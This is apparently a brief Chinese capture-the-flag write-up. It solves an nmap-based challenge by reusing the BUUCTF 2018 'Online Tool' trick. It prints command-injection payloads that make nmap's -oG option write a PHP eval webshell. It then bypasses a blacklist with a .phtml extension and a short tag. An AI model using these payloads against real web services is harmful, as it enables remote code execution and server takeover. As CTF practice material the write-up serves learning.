进去是nmap的命令输入,buu之前有一道题也是这个
我直接把buu那个放进去一试
[BUUCTF 2018]Online Tool
127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG test.php'
过滤一些东西
通过测试
改后缀为phtml加短标签可以绕过这个黑名单
payload
127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG test.phtml'
上传完后,直接进到我们写的马那
、
成功getshell